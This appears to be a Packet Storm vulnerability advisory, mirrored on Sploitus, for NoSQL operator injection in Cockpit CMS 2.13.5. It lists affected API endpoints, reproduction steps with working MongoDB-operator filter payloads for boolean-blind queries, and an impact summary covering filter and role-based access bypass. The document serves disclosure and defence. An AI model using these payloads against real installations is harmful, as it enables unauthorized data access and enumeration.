Share
## https://sploitus.com/exploit?id=PACKETSTORM:218786
Cockpit CMS 2.13.5 NoSQL Injection
    
    Description:
    Cockpit CMS 2.13.5 is vulnerable to NoSQL operator injection on multiple
    API endpoints. User-supplied filter objects are forwarded to the Mongolite
    query engine without stripping MongoDB operators ($ne, $gt, $regex,
    $exists). Authenticated users can bypass intended query filters and perform
    boolean-based blind queries against fields the application does not expose
    through its UI.
    
    Source URL: https://github.com/Cockpit-HQ/Cockpit
    Software URL: https://getcockpit.com/
    
    Affected Endpoints:
    - POST /content/collection/find/{model}  (options.filter)
    - GET  /api/content/items/{model}        (filter)
    - POST /system/users/load                (filter)
    - POST /system/logs/load                 (filter)
    
    Steps to Reproduce:
    
    1. Log in to Cockpit CMS 2.13.5 and capture the session cookie and
    X-CSRF-Token.
    
    2. Baseline request (no filter) on /content/collection/find/{model}:
       {"options":{"limit":100}}
       Response: all items.
    
    3. Inject MongoDB operator:
       {"options":{"filter":{"title":{"$regex":"^S"}},"limit":100}}
       Response: only items whose title begins with "S". Operator executed
    server-side.
    
    4. Boolean-blind confirmation โ€” TRUE condition:
       {"options":{"filter":{"_id":{"$exists":true}},"limit":100}}
       Response: full set.
    
       FALSE condition:
       {"options":{"filter":{"title":{"$regex":"^IMPOSSIBLEXYZ$"}},"limit":100}}
       Response: empty set.
    
    Evidence matrix (baseline vs injected, /content/collection/find/sinktest):
    No filter:            7 items, 1958 bytes
    $ne exclusion:        6 items, 1656 bytes
    $regex ^S:            2 items,  644 bytes
    $regex impossible:    0 items,   41 bytes
    $gt comparison:       4 items, 1088 bytes
    
    Impact:
    - Authenticated users bypass intended query filters and can access records
    through operator injection that the UI does not permit.
    - Boolean-based blind queries are possible via differences in response
    size, which could in principle be used to enumerate field contents against
    any filter-reachable field.
    - RBAC that relies on query filters rather than explicit authorization
    checks can be bypassed.
    
    Disclosure Timeline:
    - Public disclosure to Packet Storm: 2026-04-12